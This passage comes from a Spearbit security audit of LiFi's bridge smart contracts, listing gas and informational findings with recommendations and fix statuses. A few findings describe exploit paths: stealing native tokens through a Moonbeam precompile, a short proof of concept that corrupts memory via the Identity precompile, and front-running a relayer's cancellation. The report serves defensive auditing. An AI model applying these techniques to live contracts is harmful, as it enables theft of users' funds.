by the contract’s owner, can use msg.sender to read owner’s In all these cases below, ownership check is already done, so it is address after the ownership check is done. guaranteed that owner == msg.sender. LibAsset.transferAsset(tokenAddress, payable(owner), balance); ... LibAsset.transferAsset(tokenAddresses[i], payable(owner), balance); ... if (_newOwner == owner) revert NewOwnerMustNotBeSelf(); owner is a state variable, so reading it has significant gas costs. This can be avoided here by using msg.sender instead. Recommendation: Replace owner with msg.sender for all the instances pointed out here. LiFi: Fixed with PR #36. Spearbit: Verified. 46 +5.4.9 Increment for loop variable in an unchecked block Severity: Gas Optimization Context: StargateFacet.sol#L107, DexManagerFacet.sol#L50 , DexManagerFacet.sol#L76, DexManager- Facet.sol#L95, DiamondLoupeFacet.sol#L24, FeeCollector.sol#L98, FeeCollector.sol#L130, Executor.sol#L328, Executor.sol#L341, SwapperV2.sol#L31, SwapperV2.sol#L72, SwapperV2.sol#L89 DexManagerFacet.sol#L131, GenericBridgeFacet.sol#L78, Description: (This is only relevant if you are using the default solidity checked arithmetic). i++ involves checked arithmetic, which is not required. This is because the value of i is always strictly less than length <= 2**256 - 1. Therefore, the theoretical maximum value of i to enter the for-loop body is 2**256 - 2. This means that the i++ in the for loop can never overflow. Regardless, the overflow checks are performed by the compiler. Unfortunately, the Solidity optimizer is not smart enough to detect this and remove the checks. One can manually do this by: for (uint i = 0; i < length; ) { // do something that doesn't change the value of i unchecked { ++i; } } Recommendation: Consider incrementing the for loop variable in an unchecked block. LiFi: Fixed with PR #58. Spearbit: Verified. 5.5 Informational +5.5.1 Executor should consider pre-deployed contract behaviors Severity: Informational Context: Executor.sol#L280, Executor.sol#L303 Description: Executor contract allows users to do arbitrary calls. This allows users to trigger pre-deployed contracts (which are used on specific chains). Since the behaviors of pre-deployed contracts differ, dapps on different evm compatible chain would have different security assumption. Please refer to the Avax bug fix. Native-asset-call-deprecation Were the native asset call not deprecated, exploiters can bypass the check and triggers ERC20Proxy through the pre-deployed contract. Since the Avalanche team has deprecated the dangerous pre-deployed, the current Executor contract is not vulnerable. Moonbeam’s pre-deployed contract also has strange behaviors. Precompiles erc20 allows users transfer native token through ERC20 interface. Users can steal native tokens on the Executor by setting callTo = address(802) and calldata = transfer(receiver, amount) One of the standard ethereum mainnet precompiles is "Identity" (0x4), which copies memory. Depending on the use of memory variables of the function that does the callTo, it can corrupt memory. Here is a POC: 47 pragma solidity ^0.8.17; import "hardhat/console.sol"; contract Identity { function CorruptMem() public { uint dest = 128; uint data = dest + 1 ; uint len = 4; assembly { if iszero(call(gas(), 0x04, 0, add(data, 0x20), len, add(dest,0x20), len)) { invalid() } } } constructor() { string memory a = "Test!"; CorruptMem(); console.log(string(a)); // --> est!! } } Recommendation: Check the callTo is a contract (e.g. has codesize != 0). This prevents callings precompiles as they normally have codesize of 0. As an extra precaution check the precompiles on new chains to make sure they indeed have codesize == 0. LiFi: Fixed with PR #12. Spearbit: Verified. This will prevent calling precompiles with 0 codesize. We also suggest checking precompiles and documentation carefully before launching on a new chain. +5.5.2 Documentation improvements Severity: Informational Context: HyphenFacet.md#L15, README.md#L3 Description: There are a few issues in the documentation: • HyphenFacet’s documentation describes a function no longer present. • Link to DexManagerFacet in README.md is incorrect. Recommendation: • Delete line at HyphenFacet.md#L15. • Change README.md#L3 to: - - [DEX Manager Facet](/DexManagerFacet.md) + - [DEX Manager Facet](./DexManagerFacet.md) LiFi: Implemented with PR #90. Spearbit: Verified. 48 +5.5.3 Check quoteTimestamp is within ten minutes Severity: Informational Context: AcrossFacet.sol#L111 Description: quoteTimestamp is not validated. According to Across, quoteTimestamp variable, at which the depositor will be quoted for L1 liquidity. This enables the depositor to know the L1 fees before submitting their deposit. Must be within 10 mins of the current time. function _startBridge(AcrossData memory _acrossData) internal { bool isNative = _acrossData.token == ZERO_ADDRESS; if (isNative) _acrossData.token = _acrossData.weth; else LibAsset.maxApproveERC20(IERC20(_acrossData.token), _acrossData.spokePool, ,! _acrossData.amount); IAcrossSpokePool pool = IAcrossSpokePool(_acrossData.spokePool); pool.deposit{ value: isNative ? _acrossData.amount : 0 }( _acrossData.recipient, _acrossData.token, _acrossData.amount, _acrossData.destinationChainId, _acrossData.relayerFeePct, _acrossData.quoteTimestamp ); } Recommendation: Validate quoteTimestamp on the facet. LiFi: Fixed with PR #82, PR #97. Spearbit: Verified. +5.5.4 Integrate two versions of depositAsset() Severity: Informational Context: LibAsset.sol#L89-L110 Description: The function depositAsset(, , isNative ) doesn’t check tokenId == NATIVE_ASSETID, although depositAsset(,) does. In the code base depositAsset(, , isNative ) isn’t used. function depositAsset( address tokenId, uint256 amount, bool isNative ) internal { if (amount == 0) revert InvalidAmount(); if (isNative) { ... } else { ... } } function depositAsset(address tokenId, uint256 amount) internal { return depositAsset(tokenId, amount, tokenId == NATIVE_ASSETID); } Recommendation: Consider to integrate the two functions. Could also use isNativeAsset() instead of tokenId == NATIVE_ASSETID. LiFi: Fixed with PR #75. Spearbit: Verified. 49 +5.5.5 Simplify batchRemoveDex() Severity: Informational Context: DexManagerFacet.sol#L86-L109 Description: The code of batchRemoveDex() is somewhat difficult to understand and thus to maintain. function batchRemoveDex(address[] calldata _dexs) external { ... uint256 jlength = storageDexes.length; for (uint256 i = 0; i < ilength; i++) { ... for (uint256 j = 0; j < jlength; j++) { if (storageDexes[j] == _dexs[i]) { ... // update storageDexes.length; jlength = storageDexes.length; break; } } } } Recommendation: Consider changing the code to something like the following: function batchRemoveDex(address[] calldata _dexs) external { ... uint256 jlength = storageDexes.length; for (uint256 i = 0; i < ilength; i++) { ... uint256 jlength = storageDexes.length; for (uint256 j = 0; j < jlength; j++) { if (storageDexes[j] == _dexs[i]) { ... // update storageDexes.length; jlength = storageDexes.length; break; } } } - + - } LiFi: Fixed with PR #88. Spearbit: Verified. +5.5.6 Error handing in executeCallAndWithdraw Severity: Informational Context: WithdrawFacet.sol#L35-L59 Description: If isContract happens to be false then success is false (as it is initialized as false and not updated) Thus the _withdrawAsset() will never happen. Function withdraw() also exist so this functionality isn’t necessary but its more logical to revert earlier. 50 function executeCallAndWithdraw(...) ... { ... bool success; bool isContract = LibAsset.isContract(_callTo); if (isContract) { false // thus is false ,! (success, ) = _callTo.call(_callData); } if (success) { // if this is false, then success stays _withdrawAsset(_assetAddress, _to, _amount); // this never happens if isContract == false } else { revert WithdrawFailed(); } } Recommendation: Consider changing the code to: function executeCallAndWithdraw(...) ... { ... bool success; bool isContract = LibAsset.isContract(_callTo); if (!isContract) revert NoContract(); if (isContract) { (success, ) = _callTo.call(_callData); } if (success) { _withdrawAsset(_assetAddress, _to, _amount); } else { revert WithdrawFailed(); } + - - } LiFi: Fixed with PR #87. Spearbit: Verified. +5.5.7 _withdrawAsset() could use LibAsset.transferAsset() Severity: Informational Context: WithdrawFacet.sol#L80-L100, LibAsset.sol#L126-L134 Description: A large part of the function _withdrawAsset() is very similar to LibAsset.transferAsset(). function _withdrawAsset(...) ... { ... if (_assetAddress == NATIVE_ASSET) { address self = address(this); if (_amount > self.balance) revert NotEnoughBalance(_amount, self.balance); (bool success, ) = payable(sendTo).call{ value: _amount }(""); if (!success) revert WithdrawFailed(); } else { assetBalance = IERC20(_assetAddress).balanceOf(address(this)); if (_amount > assetBalance) revert NotEnoughBalance(_amount, assetBalance); SafeERC20.safeTransfer(IERC20(_assetAddress), sendTo, _amount); } ... } Recommendation: Consider using LibAsset.transferAsset(). 51 LiFi: Fixed with PR #86. Spearbit: Verified. +5.5.8 anySwapOut() doesn’t lower allowance Severity: Informational Context: AnyswapFacet.sol#L112-L145 Description: The function anySwapOut() only seems to work with Anyswap tokens. It burns the received to- kens here: AnyswapV5Router.sol#L334 This burning doesn’t use/lower the allowance, so the allowance will stay present. Also see howto: function anySwapOut ==> no need to approve. function _startBridge(...) ... { ... LibAsset.maxApproveERC20(IERC20(underlyingToken), _anyswapData.router, _anyswapData.amount); ... IAnyswapRouter(_anyswapData.router).anySwapOut(...); } Recommendation: Consider skip setting an allowance, which also saves some gas. e.g. move the LibAs- set.maxApproveERC20() to the if clause, before anySwapOutUnderlying(). Add a comment that anySwapOut() only supports anyswap tokens. LiFi: Fixed with PR #81. Spearbit: Verified. +5.5.9 Anyswap rebrand Severity: Informational Context: AnyswapFacet.sol Description: Anyswap is rebranded to Multichain see rebrand. Recommendation: Consider renaming the AnyswapFacet. LiFi: Fixed with PR #81. Spearbit: Verified. +5.5.10 Check processing of native tokens in AnyswapFacet Severity: Informational Context: AnyswapFacet.sol#L32-L144 Description: The variable isNative seems to mean a wrapped native token is used (see function _getUnderly- ingToken() ). Currently startBridgeTokensViaAnyswap() skips LibAsset.depositAsset() when isNative == true, but a wrapped native tokens should also be moved via LibAsset.depositAsset(). Also _startBridge() tries to send native tokens with { value: _anyswapData.amount } then isNative == true, but this wouldn’t work with wrapped tokens. The Howto seems to indicate an approval (of the wrapped native token) is neccesary. 52 contract AnyswapFacet is ILiFi, SwapperV2, ReentrancyGuard { ,! ,! function startBridgeTokensViaAnyswap(LiFiData calldata _lifiData, AnyswapData calldata _anyswapData) ... { { // Multichain (formerly Anyswap) tokens can wrap other tokens (address underlyingToken, bool isNative) = _getUnderlyingToken(_anyswapData.token, _anyswapData.router); if (!isNative) LibAsset.depositAsset(underlyingToken, _anyswapData.amount); ... } function _getUnderlyingToken(address token, address router) ... { ... if (token == address(0)) revert TokenAddressIsZero(); underlyingToken = IAnyswapToken(token).underlying(); // The native token does not use the standard null address ID isNative = IAnyswapRouter(router).wNATIVE() == underlyingToken; // Some Multichain complying tokens may wrap nothing if (!isNative && underlyingToken == address(0)) { underlyingToken = token; } } function _startBridge(... ) ... { ... if (isNative) { IAnyswapRouter(_anyswapData.router).anySwapOutNative{ value: _anyswapData.amount }(...); // ,! send native tokens } ... } } Recommendation: Double check the conclusions about the native tokens and update the logic for native tokens if necessary. LiFi: Fixed with PR #81. Spearbit: Verified. +5.5.11 Remove payable in swapAndCompleteBridgeTokensViaStargate() Severity: Informational Context: Executor.sol#L105-L171 Description: There are 2 versions of sgReceive() / completeBridgeTokensViaStargate() which use different locations for nonReentrant The function swapAndCompleteBridgeTokensViaStargate of Executor is payable but doesn’t receive native to- kens. 53 contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function sgReceive(...) external { // not payable ... this.swapAndCompleteBridgeTokensViaStargate(lifiData, swapData, assetId, payable(receiver)); // ,! doesn't send native assets ... } function swapAndCompleteBridgeTokensViaStargate(...) external payable nonReentrant { // is payable if (msg.sender != address(this)) { revert InvalidCaller(); } } } Recommendation: Consider removing the payable keyword. Note: also see issue "Use internal where possi- ble", which will also solve this. LiFi: Fixed with commit 78ac. Spearbit: Verified. +5.5.12 Use the same order for inherited contracts. Severity: Informational Context: LiFi src Description: The inheritance of contract isn’t always done in the same order. For code consistency its best to always put them in the same order. contract AmarokFacet contract AnyswapFacet contract ArbitrumBridgeFacet contract CBridgeFacet contract GenericSwapFacet contract GnosisBridgeFacet contract HopFacet contract HyphenFacet contract NXTPFacet contract OmniBridgeFacet contract OptimismBridgeFacet contract PolygonBridgeFacet contract StargateFacet contract GenericBridgeFacet contract WormholeFacet contract AcrossFacet contract Executor is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, SwapperV2, ReentrancyGuard { is ILiFi, ReentrancyGuard { is ILiFi, ReentrancyGuard, Swapper { is ILiFi, ReentrancyGuard, SwapperV2 { is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { Recommendation: Always use the same order for inherited contracts. LiFi: Fixed with PR #80. Spearbit: Verified. 54 +5.5.13 Catch potential revert in swapAndStartBridgeTokensViaStargate() Severity: Informational Context: StargateFacet.sol#L95-L114 Description: The following statement nativeFee -= _swapData[i].fromAmount; can revert in the swapAnd- StartBridgeTokensViaStargate(). function swapAndStartBridgeTokensViaStargate(...) ... { ... for (uint8 i = 0; i < _swapData.length; i++) { if (LibAsset.isNativeAsset(_swapData[i].sendingAssetId)) { nativeFee -= _swapData[i].fromAmount; // can revert } } ... } Recommendation: Consider catching this situation and give an appropriate error message. LiFi: Fixed with PR #85. Spearbit: Verified. +5.5.14 No need to use library If It is in the same file Severity: Informational Context: LibAsset.sol#L99-L101 Description: On the LibAsset, some of the functions are called through LibAsset., however there is no need to call because the functions are in the same solidity file. ... ... if (msg.value != 0) revert NativeValueWithERC(); uint256 _fromTokenBalance = LibAsset.getOwnBalance(tokenId); LibAsset.transferFromERC20(tokenId, msg.sender, address(this), amount); if (LibAsset.getOwnBalance(tokenId) - _fromTokenBalance != amount) revert InvalidAmount(); Recommendation: Change implementation with : ... - - - + + + ... if (msg.value != 0) revert NativeValueWithERC(); uint256 _fromTokenBalance = LibAsset.getOwnBalance(tokenId); LibAsset.transferFromERC20(tokenId, msg.sender, address(this), amount); if (LibAsset.getOwnBalance(tokenId) - _fromTokenBalance != amount) revert InvalidAmount(); uint256 _fromTokenBalance = getOwnBalance(tokenId); transferFromERC20(tokenId, msg.sender, address(this), amount); if (getOwnBalance(tokenId) - _fromTokenBalance != amount) revert InvalidAmount(); LiFi: Fixed in the recent LibAsset.sol version. Spearbit: Verified. 55 +5.5.15 Combined Optimism and Synthetix bridge Severity: Informational Context: OptimismBridgeFacet.sol#L89-L130 Description: The Optimism bridge also includes a specific bridge for Synthetix tokens. Perhaps it is more clear to have a seperate Facet for this. function _startBridge(...) ... { ... if (_bridgeData.isSynthetix) { bridge.depositTo(_bridgeData.receiver, _amount); } else { ... } } Recommendation: Consider using a separate facet for the Synthetix bridge. LiFi: We don’t have any plans to separate and maintain two separate facets for this. Spearbit: Acknowledged. +5.5.16 Doublecheck the Diamond pattern Severity: Informational Context: ERC20Proxy.sol Description: The LiFi protocol uses the diamond pattern. This pattern is relative complex and has overhead for the delegatecall. There is not much synergy between the different bridges (except for access controls & white lists). By combining all the bridges in one contract, the risk of one bridge might have an influence on another bridge. Recommendation: Consider having separate contracts for separate bridges. If one destination for allowances is desired, consider using the ERC20Proxy.sol on the source chain. LiFi: LiFi Team claims that there is no plans to switch patterns at this time. Spearbit: Acknowledged. +5.5.17 Reference Diamond standard Severity: Informational Context: LiFiDiamond.sol Description: The LiFiDiamond.sol contract doesn’t contain a reference to the Diamond contract. Having that would make it easier for readers of the code to find the origin of the contract. Recommendation: Consider adding a reference to the diamond standard: eip-2535 LiFi: Added with PR #83. Spearbit: Verified. 56 +5.5.18 Validate Nxtp InvariantTransactionData Severity: Informational Context: NXTPFacet.sol#L80 Description: During the code review, It has been noticed that InvariantTransactionData’s fields are not validated. Even if the validation located in the router, sendingChainFallback and receivingAddress parameters are sensible and connext does not have meaningful error message on these parameter validation. Also, router parameter does not have any validation. Most of the other facets have. For instance : Amarok Facet Note: also see issue "Hardcode bridge addresses via immutable" function _startBridge(NXTPData memory _nxtpData) private returns (bytes32) { ITransactionManager txManager = ITransactionManager(_nxtpData.nxtpTxManager); IERC20 sendingAssetId = IERC20(_nxtpData.invariantData.sendingAssetId); // Give Connext approval to bridge tokens LibAsset.maxApproveERC20(IERC20(sendingAssetId), _nxtpData.nxtpTxManager, _nxtpData.amount); uint256 value = LibAsset.isNativeAsset(address(sendingAssetId)) ? _nxtpData.amount : 0; // Initiate bridge transaction on sending chain ITransactionManager.TransactionData memory result = txManager.prepare{ value: value }( ITransactionManager.PrepareArgs( _nxtpData.invariantData, _nxtpData.amount, _nxtpData.expiry, _nxtpData.encryptedCallData, _nxtpData.encodedBid, _nxtpData.bidSignature, _nxtpData.encodedMeta ) ); return result.transactionId; } Recommendation: Implement validations on the parameters. Ensure that fields like a sendingChainFallback and receivingAddress are not empty and keep hardcode or whitelist router parameter with immutable. LiFi: Fixed with PR #69. Spearbit: Verified. +5.5.19 Executor contract should not handle cross-chain swap from Connext Severity: Informational Context: Executor.sol#L173-L221 Description: The Executor contract is designed to handle a swap at the destination chain. The LIFI protocol may build a cross-chain transaction to call Executor.swapAndCompleteBridgeTokens at the destination chain. In order to do a flexible swap, the Executor can perform arbitrary execution. Executor.sol#L323-L333 57 function _executeSwaps( LiFiData memory _lifiData, LibSwap.SwapData[] calldata _swapData, address payable _receiver ) private noLeftovers(_swapData, _receiver) { for (uint256 i = 0; i < _swapData.length; i++) { if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ,! ERC20 Proxy directly LibSwap.SwapData calldata currentSwapData = _swapData[i]; LibSwap.swap(_lifiData.transactionId, currentSwapData); } } However, the receiver address is a privileged address in some bridging services. Allowing users to do arbitrary execution/ external calls is dangerous. The Connext protocol is an example : Connext contractAPI#cancel The receiver address can prematurely cancel a cross-chain transaction. When a cross-chain execution is canceled, the funds would be sent to the fallback address without executing the external call. Exploiters can front-run a gelato relayer and cancel a cross-chain execution. The (post-swap) tokens will be sent to the receiver’s address. The exploiters can grab the tokens left in the Executor in the same transaction. Recommendation: Since Executor is designed to handle execution at the destination chain, we should put some restrictions on the external call. Recommend to only allow whitelist actions or never use the Executor to handle cross-chain swap from Connext. LiFi: The Executor was designed to be separate from the main LIFI protocol contract so that devs can integrate and build what they wish. This is why we do not have a whitelist. The cancel method you speak of does not allow just anyone to call as far as we know. It must be called with a signature from the actual user’s wallet. We plan to keep this contract open while mitigating as much as possible. Spearbit: Thanks for pointing this out. The cancel method only allows msg.sender == user or a valid signature signed by the user. TransactionManager.sol#L619 Downgrading the severity as args.txData.user is usually directly set to the user’s wallet instead of the executor contract +5.5.20 Avoid using strings in the interface of the Axelar Facet Severity: Informational Context: AxelarFacet.sol#L30-L66 Description: The Axelar Facet uses strings to indicate the destinationChain, destinationAddress, which is different then on other bridge facets. function executeCallWithTokenViaAxelar( string memory destinationChain, string memory destinationAddress, string memory symbol, ... ) ...{ } The contract address is (or at least can be) encoded as a hex string, as seen in this example: /// https://etherscan.io/tx/0x7477d550f0948b0933cf443e9c972005f142dfc5ef720c3a3324cefdc40ecfa2 # 0 1 2 3 4 Type Name destinationChain string destinationContractAddress payload symbol amount bytes string uint256 50000000 0xA57ADCE1d2fE72949E4308867D894CD7E7DE0ef2 Data binance string USDC 58 The Axelar bridge allows bridging to non EVM chains, however the LiFi protocol doesn’t seem to support thus. So its good to prevent accidentally sending to non EVM chains. Here are the supported non EVM chains: non-evm- networks The Axelar interface doesn’t have a (compatible) emit. Recommendation: Consider doing the following for both executeCallViaAxelar() and executeCallWithToken- ViaAxelar() : Change destinationChain, destinationAddress and symbol to type uint.. , address , address. Have a map- ping/conversion to a string within the function. Check the destinationChain to limit the transfers to EVM chains only. The token name can be retrieved from the token contract itself and verified via the axelar tokenAddresses() function. Note: also see issue "Event of transfer is not emitted in the AxelarFacet" Note: also see issue "Use same layout for facets" If the interfaces aren’t changed, at least check that destinationAddress can be converted from hex to a valid address. LiFi: Fixed with PR #67. Spearbit: Verified. +5.5.21 Hardcode source Nomad domain ID via immutable Severity: Informational Context: AmarokFacet.sol#L130, Description: AmarokFacet takes source domain ID as a user parameter and passes it to the bridge: originDomain: _bridgeData.srcChainDomain User provided can be incorrect, and Connext will later revert the transaction. See BridgeFacet.sol#L319-L321: if (_args.params.originDomain != s.domain) { revert BridgeFacet__xcall_wrongDomain(); } Recommendation: Consider storing the chain’s Nomad domain ID as an immutable variable in AmarokFacet, and pass that to the Connext bridge. There is no gas overhead for this due to storing the ID as immutable. LiFi: Fixed with PR #50. Spearbit: Verified. +5.5.22 Amount swapped not emitted Severity: Informational Context: ILiFi.sol#L20-L41 Description: The emits LiFiTransferStarted() and LiFiTransferCompleted() don’t emit the amount after the swap (e.g. the real amount that is being bridged / transferred to the receiver). This might be useful to add. 59 event LiFiTransferStarted( bytes32 indexed transactionId, string bridge, string bridgeData, string integrator, address referrer, address sendingAssetId, address receivingAssetId, address receiver, uint256 amount, uint256 destinationChainId, bool hasSourceSwap, bool hasDestinationCall ); event LiFiTransferCompleted( bytes32 indexed transactionId, address receivingAssetId, address receiver, uint256 amount, uint256 timestamp ); Recommendation: Consider adding the amount swapped to the emits LiFiTransferStarted() and LiFiTrans- ferCompleted() LiFi: Fixed with PR #75. Spearbit: Verified. +5.5.23 Comment is not compatible with code Severity: Informational Context: HyphenFacet.sol#L100 Description: On the HyphenFacet, Comment is mentioned that approval is given to Anyswap. But, approval is given to Hyphen router. function _startBridge(HyphenData memory _hyphenData) private { // Check chain id if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork(); if (_hyphenData.token != address(0)) { // Give Anyswap approval to bridge tokens LibAsset.maxApproveERC20(IERC20(_hyphenData.token), _hyphenData.router, _hyphenData.amount); } Recommendation: Change comment on the HyphenFacet. LiFi: Fixed with PR #61. Spearbit: Verified. 60 +5.5.24 Move whitelist to LibSwap.swap() Severity: Informational Context: LibSwap.sol#L30-L68, SwapperV2.sol#L67-L81 Description: The function LibSwap.swap() is dangerous because it can call any function of any contract. If this is exposed to the outside (like in GenericBridgeFacet), is might enable access to transferFrom() and thus stealing tokens. Also see issue "Too generic calls in GenericBridgeFacet allow stealing of tokens" Luckily most of the time LibSwap.swap() is called via _executeSwaps(), which has a whitelist and reduces the risk. To improve security it would be better to integrate the whitelists in LibSwap.swap(). Note: also see issue "_executeSwaps of Executor.sol doesn’t have a whitelist" library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { if (!LibAsset.isContract(_swapData.callTo)) revert InvalidContract(); ... (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); ... } } contract SwapperV2 is ILiFi { function _executeSwaps(...) ... { ... if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, currentSwapData); } } } Recommendation: Consider moving the whitelists from SwapperV2 into function LibSwap.swap(). Once the whitelist are integrated then this check: if (!LibAsset.isContract(_swapData.callTo)) can be moved to the whitelisting management functions. This will save gas when calling LibSwap.swap(). Alternatively add a warning comment to function LibSwap.swap() which indicates the risk. LiFi: We do not intend to add whitelisting to the library as it is intended to be more low level and less restrictive. Whitelisting will be done if desired by the individual contracts that utilize it. Spearbit: Acknowledged. +5.5.25 Redundant check on the HyphenFacet Severity: Informational Context: HyphenFacet.sol#L97 Description: In the HyphenFacet, there is a condition which checks source chain is different than destination chain id. However, the conditional check is already placed on the Hyphen contracts. _depositErc20, _depositNative) function _startBridge(HyphenData memory _hyphenData) private { // Check chain id if (block.chainid == _hyphenData.toChainId) revert CannotBridgeToSameNetwork(); } Recommendation: Although the prestate checks are useful, the redundant check can be removed. 61 LiFi: Fixed with PR #55. Spearbit: Verified. +5.5.26 Check input amount equals swapped amount Severity: Informational Context: StargateFacet.sol#L95-L114 OmniBridgeFacet.sol#L52-L68, SwapperV2.sol#L22-L39, Executor.sol#L146-L150, Description: The bridge functions don’t check that input amount ( _bridgeData.amount or msg.value) is equal to the swapped amount (_swapData[0].fromAmount). This could lead to funds remaining in the LiFi Diamond or Executor. Luckily noLeftovers() or checks on startingBalance solve this by sending the remaining balance to the origina- tor or receiver. However this is fixing symptoms instead of preventing the issue. function swapAndStartBridgeTokensViaOmniBridge( ... LibSwap.SwapData[] calldata _swapData, BridgeData calldata _bridgeData ) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); ... } Recommendation: Verify the input amount is equal to the swapped amount. Also check issue "Consider using wrapped native token": As the function swapAndStartBridgeTokensViaStar- gate() shows, the native tokens can be used on every swap, so checking it thoroughly requires a for loop. function swapAndStartBridgeTokensViaStargate(...) ... { ... uint256 nativeFee = msg.value; for (uint8 i = 0; i < _swapData.length; i++) { if (LibAsset.isNativeAsset(_swapData[i].sendingAssetId)) { nativeFee -= _swapData[i].fromAmount; } } ... } LiFi: Acknowledged. Spearbit: Acknowledged. +5.5.27 Use same layout for facets Severity: Informational Context: LiFi Facets Description: The different bridge facets use different layouts for the source code. This can be seen at the call to _startBridge(). The code is easier to maintain If it is the same everywhere. 62 AmarokFacet.sol: ArbitrumBridgeFacet.sol: OmniBridgeFacet.sol: OptimismBridgeFacet.sol: PolygonBridgeFacet.sol: StargateFacet.sol: AcrossFacet.sol: CBridgeFacet.sol: GenericBridgeFacet.sol: GnosisBridgeFacet.sol: HopFacet.sol: HyphenFacet.sol: NXTPFacet.sol: AnyswapFacet.sol: WormholeFacet.sol: AxelarFacet.sol: _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, amount, true); _startBridge(_lifiData, _bridgeData, true); _startBridge(_stargateData, _lifiData, nativeFee, true); _startBridge(_acrossData); _startBridge(_cBridgeData); _startBridge(_bridgeData); _startBridge(gnosisBridgeData); _startBridge(_hopData); _startBridge(_hyphenData); _startBridge(_nxtpData); _startBridge(_anyswapData, underlyingToken, isNative); _startBridge(_wormholeData); // no _startBridge Recommendation: Consider using the same layout everywhere. LiFi: Acknowledged. Spearbit: Acknowledged. +5.5.28 Safety check is missing on the remaining amount Severity: Informational Context: FeeCollector.sol#L70 Description: On the FeeCollector contract, There is no safety check to ensure remaining amount doesn’t under- flow and revert. function collectNativeFees( uint256 integratorFee, uint256 lifiFee, address integratorAddress ) external payable { ... ... } uint256 remaining = msg.value - (integratorFee + lifiFee); Recommendation: It is recommended to implement check to ensure that msg.value is bigger than integrator- Fee + lifiFee. function collectNativeFees( uint256 integratorFee, uint256 lifiFee, address integratorAddress ) external payable { if(msg.value < integratorFee + lifiFee) revert NotEnoughAmount(); uint256 remaining = msg.value - (integratorFee + lifiFee); + ... ... } LiFi: Fixed with PR #47. Spearbit: Verified. 63 +5.5.29 Entire struct can be emitted Severity: Informational Context: OmniBridgeFacet.sol#L34-L107 Description: The emit LiFiTransferStarted() generally outputs the entire struct _lifiData by specifying all Its also possible to emit the entire struct in one go. This would make the code smaller and fields of the struct. easier to maintain. function _startBridge(LiFiData calldata _lifiData, ... ) ... { ... // do actions emit LiFiTransferStarted( _lifiData.transactionId, "omni", "", _lifiData.integrator, _lifiData.referrer, _lifiData.sendingAssetId, _lifiData.receivingAssetId, _lifiData.receiver, _lifiData.amount, _lifiData.destinationChainId, _hasSourceSwap, false ); } Recommendation: Consider emitting the entire struct. Note: the indexed fields have to be separated out. It could look like this: emit LiFiTransferStarted(transactionId,_lifiData,bridge,bridgeData,hasSourceSwap,hasDestinationCall); Or like this, if the remaining fields are also put in the struct and the data is added before the emit: emit LiFiTransferStarted(transactionId,_lifiData); LiFi: Generally we do not emit the lifiData contents, this only should happen if no other information source can be found for the event parameters. Spearbit: Acknowledged. +5.5.30 Redundant return value from internal function Severity: Informational Context: NXTPFacet.sol#L143 Description: Callers of NXTPFacet._startBridge() function never use its return value. Recommendation: Consider removing line NXTPFacet.sol#L143 and emitting an event to log important data instead. LiFi: Fixed with PR #52. Spearbit: Verified. 64 +5.5.31 Change comment on the LibAsset Severity: Informational Context: LibAsset.sol#L8 Description: The following comment is used in the LibAsset.sol contract. However, Connext doesn’t have this file anymore and deleted with the following commit. /// @title LibAsset /// @author Connext /// @notice This library contains helpers for dealing with onchain transfers /// /// library LibAsset {} of assets, including accounting for the native asset `assetId` conventions and any noncompliant ERC20 transfers Recommendation: Consider changing comment on the library. LiFi: Fixed with PR #45. Spearbit: Verified. +5.5.32 Integrate all variants of _executeAndCheckSwaps() Severity: Informational Context: Executor.sol#L126-L171, Executor.sol#L178-L221, Executor.sol#L228-L265, SwapperV2.sol#L46-L60, Swapper.sol#L45-L58, XChainExecFacet.sol#L17-L52 Description: There are multiple functions that are more or less the same: • swapAndCompleteBridgeTokensViaStargate() of Executor.sol • swapAndCompleteBridgeTokens() of Executor.sol • swapAndExecute() of Executor.sol • _executeAndCheckSwaps() of SwapperV2.sol • _executeAndCheckSwaps() of Swapper.sol • swapAndCompleteBridgeTokens() of XChainExecFacet As these are important functions it is worth the trouble to have one code base to maintain. For example swapAnd- CompleteBridgeTokens() doesn’t check msg.value ==0 when ERC20 tokens are send. Note: swapAndCompleteBridgeTokensViaStargate() of StargateFacet.sol already uses SwapperV2.sol Recommendation: Integrate the function to use one code base. The slight differences of the function should of course be separated out. Also combine this with issue: "Pulling tokens by LibSwap.swap() is counterintuitive" LiFi: Acknowledged. Spearbit: Acknowledged. 65 +5.5.33 Utilize NATIVE_ASSETID constant from LibAsset Severity: Informational Context: AcrossFacet.sol#L20, WithdrawFacet.sol#L16, WithdrawFacet.sol#L85, DexManagerFacet.sol#L168 Description: In the codebase, LibAsset library contains the variable which defines zero address. However, on the facets the check is repeated. Code should not be repeated and it’s better to have one version used everywhere to reduce likelihood of bugs. contract AcrossFacet { address internal constant ZERO_ADDRESS = 0x0000000000000000000000000000000000000000; } contract DexManagerFacet { if (_dex == 0x0000000000000000000000000000000000000000) } contract WithdrawFacet { address private constant NATIVE_ASSET = 0x0000000000000000000000000000000000000000; ... } address sendTo = (_to == address(0)) ? msg.sender : _to; Recommendation: Use LibAsset’s NATIVE_ASSETID or NULL_ADDRESS variable. LiFi: Fixed with PR #41. Spearbit: Verified. +5.5.34 Native matic will be treated as ERC20 token Severity: Informational Context: WithdrawFacet.sol#L16 Description: LiFi supports Polygon on their implementation. 